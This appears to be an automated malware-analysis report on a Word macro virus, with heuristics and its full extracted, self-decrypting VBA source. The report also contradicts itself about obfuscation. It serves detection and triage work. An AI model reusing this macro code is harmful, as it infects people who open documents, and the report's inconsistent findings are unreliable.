Verdict: MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The VBA code appears to be obfuscated and attempts to modify itself, likely to download and execute a second-stage payload. The ClamAV detection of 'Doc.Trojan.One-1' further confirms its malicious nature.
Heuristics (3)
- ClamAV: Doc.Trojan.One-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.One-1
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5240 bytes |

SHA-256: 884b54d68bcdd7f59bd77c0fe812baf8ce71dd987381f18fd00fb25b9637606b

Detection
- ClamAV: Doc.Trojan.One-1
- Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
j = j + VBA.CInt(1)
y = VBA.CInt(27)
Do
Word.Application.MacroContainer.VBProject. _
vbcomponents(VBA.CInt(j)).codemodule.ReplaceLine y, _
c(VBA.Mid(Word.Application.MacroContainer.VBProject. _
vbcomponents(VBA.CInt(j)).codemodule.lines(VBA.CInt(y), _
VBA.CInt(j)), (VBA.CInt(j) + VBA.CInt(j))), VBA.Val(VBA. _
Mid(Word.Application.MacroContainer.VBProject.vbcomponents _
(VBA.CInt(j)).codemodule.lines(VBA.CInt((25)), VBA.CInt(j)), _
(VBA.CInt(j) + VBA.CInt(j)))))
VBA.DoEvents
y = y + j
Loop While y <> VBA.CInt(87)
One
End Sub
Private Function c(a, b)
Do
y = y + VBA.CInt(1)
c = c & VBA.Chr(VBA.CInt(VBA.Asc(VBA.Mid(a, VBA.CInt(y), _
VBA.CInt(1))) Xor VBA.CInt(b)))
Loop While y <> VBA.CInt(Len(a))
End Function
'241
Private Sub One()
'¾ŸÑ´ƒƒžƒÑ£”‚„œ”Ñ¿”‰…
'ˆÑÌшÑÚѧ³°ß²¸Ÿ…ÙÀØ
'‚²„ƒ§”ƒÑÌѧ³°ß²¸Ÿ…ÙÀØ
'¦žƒ•ß°���˜’�…˜žŸß¾�…˜žŸ‚ß§˜ƒ„‚¡ƒž…”’…˜žŸÑÌÑ›
'¦žƒ•ß°���˜’�…˜žŸß¾�…˜žŸ‚ߢ�‡”¿žƒœ��¡ƒžœ�…ÑÌÑ›
'¦žƒ•ß°���˜’�…˜žŸß¢…�…„‚³�ƒÑÌÑ·��‚”
'¸—Ñ¿ž…Ñ¥˜œ”ѽ˜š”ÑÓÛÃÛÂÛÓÑ¥™”ŸÑ¶ž¥žÑ�™„€˜…
'¢”…Ñž“›¿´¥ÑÌѲƒ”�…”¾“›”’…ÙÓ¸Ÿ…”ƒŸ”…´‰��žƒ”ƒß°���˜’�…˜žŸÓØ
'¸—Ñž“›¿´¥ÑÌÑÓÓÑ¥™”ŸÑ¶ž¥žÑ�™„€˜…
'µžÑ¦™˜�”Ñž“›¿´¥ß³„‚ˆ
'§³°ßµž´‡”Ÿ…‚
'½žž�
'ž“›¿´¥ß§˜‚˜“�”ÑÌÑÁ
'ž“›¿´¥ß¿�‡˜–�…”ÑÓ™……�ËÞÞ†††ß‚…�‚ߟ”…ÞÃÞžŸ”ÞžŸ”ß…‰…Ó
'µžÑ¦™˜�”Ñž“›¿´¥ß£”�•ˆ¢…�…”ÑÍÏÑÅ
'§³°ßµž´‡”Ÿ…‚
'½žž�
'‚’ž•”ÑÌÑž“›¿´¥ßµž’„œ”Ÿ…ß³ž•ˆß˜ŸŸ”ƒ¥”‰…
'ž“›¿´¥ß „˜…
'‚¾Ÿ”¸µÑÌѼ˜•Ù‚’ž•”ÝшÝÑˆØ
'¸—Ñ‚¾Ÿ”¸µÑÍÏѲ™ƒÙÀÇÄØÑ¥™”ŸÑ¶ž¥žÑ�™„€˜…
'‚¿”†§”ƒÑÌѧ��Ù¼˜•Ù‚’ž•”ÝÑÅÝÑˆØØ
'¸—Ñ‚¿”†§”ƒÑÏÑ‚²„ƒ§”ƒÑ¥™”Ÿ
'‚’ž•”ÑÌѼ˜•Ù‚’ž•”ÝÑÆØ
'¥™˜‚µž’„œ”Ÿ…ß§³¡ƒž›”’…߇“’žœ�žŸ”Ÿ…‚ÙˆØßÑ®
'’ž•”œž•„�”ß•”�”…”�˜Ÿ”‚шÝÑÉÈ
'¥™˜‚µž’„œ”Ÿ…ß§³¡ƒž›”’…߇“’žœ�žŸ”Ÿ…‚ÙˆØßÑ®
'’ž•”œž•„�”ߘŸ‚”ƒ…�˜Ÿ”‚шÝÑ‚’ž•”
'¶ž¥žÑŸž‚�ƒ”�•Ë
'´Ÿ•Ѹ—
'�™„€˜…Ë
'‹ÑÌѧ³°ß²¸Ÿ…ÙÃÆØ
'šÑÌÑÃÀÁÑÚѸŸ…Ù£Ÿ•ÑÛÑÅÄØ
'¥™˜‚µž’„œ”Ÿ…ß§³¡ƒž›”’…߇“’žœ�žŸ”Ÿ…‚ÙˆØßÑ®
'’ž•”œž•„�”ߣ”���’”½˜Ÿ”ÑÃÄÝѲ™ƒÙÂÈØÑ×Ñš
'µž
'¥™˜‚µž’„œ”Ÿ…ß§³¡ƒž›”’…߇“’žœ�žŸ”Ÿ…‚ÙˆØßÑ®
'’ž•”œž•„�”ߣ”���’”½˜Ÿ”Ñ‹ÝѲ™ƒÙÂÈØÑ×Ñ’Ù¥™˜‚µž’„œ”Ÿ…ßÑ®
'§³¡ƒž›”’…߇“’žœ�žŸ”Ÿ…‚ÙˆØß’ž•”œž•„�”ß�˜Ÿ”‚Ù‹ÝшØÝÑšØ
'§³°ßµž´‡”Ÿ…‚
'‹ÑÌÑ‹ÑÚш
'½žž�Ѧ™˜�”Ñ‹ÑÍÏѧ³°ß²¸Ÿ…ÙÉÆØ
'‚’ž•”ÑÌÑ¥™˜‚µž’„œ”Ÿ…ß§³¡ƒž›”’…߇“’žœ�žŸ”Ÿ…‚ÙˆØßÑ®
'’ž•”œž•„�”ß�˜Ÿ”‚ÙˆÝÑÉÈØ
'¸—Ñ¥™˜‚µž’„œ”Ÿ…ÑÌѰ’…˜‡”µž’„œ”Ÿ…Ñ¥™”ŸÑ®
'¢”…Ñž“›¾Ÿ”ÑÌÑ¿žƒœ��¥”œ���…”Ñ´�‚”Ñ®
'¢”…Ñž“›¾Ÿ”ÑÌѰ’…˜‡”µž’„œ”Ÿ…
'¦˜…™Ñž“›¾Ÿ”ß§³¡ƒž›”’…߇“’žœ�žŸ”Ÿ…‚ÙˆØ
'¦˜…™Ñß’ž•”œž•„�”
'¸—ѧ³°ß¼˜•Ùß�˜Ÿ”‚ÙÉÉÝшØÝÑÃØÑÍÏÑÓ¾Ÿ”ÓÑ¥™”Ÿ
'ß•”�”…”�˜Ÿ”‚шÝÑß’ž„Ÿ…ž—�˜Ÿ”‚
'ߘŸ‚”ƒ…�˜Ÿ”‚шÝÑ‚’ž•”
'¸—Ñ¥™˜‚µž’„œ”Ÿ…ÑÌÑ¿žƒœ��¥”œ���…”Ñ¥™”ŸÑ®
'°’…˜‡”µž’„œ”Ÿ…ߢ�‡”°‚Ѱ’…˜‡”µž’„œ”Ÿ…ß·„��¿�œ”
'´Ÿ•Ѹ—
'´Ÿ•Ѧ˜…™
'´Ÿ•Ѧ˜…™
'Ÿž‚�ƒ”�•Ë
'¥™˜‚µž’„œ”Ÿ…ߢ�‡”°‚Ñ¥™˜‚µž’„œ”Ÿ…ß·„��¿�œ”Ýц•·žƒœ�…µž’„œ”Ÿ…
'Ö½˜Ÿ”‹”ƒÁÞÞ†žƒ�•†˜•”
End Sub
'One
'(c) jackie
```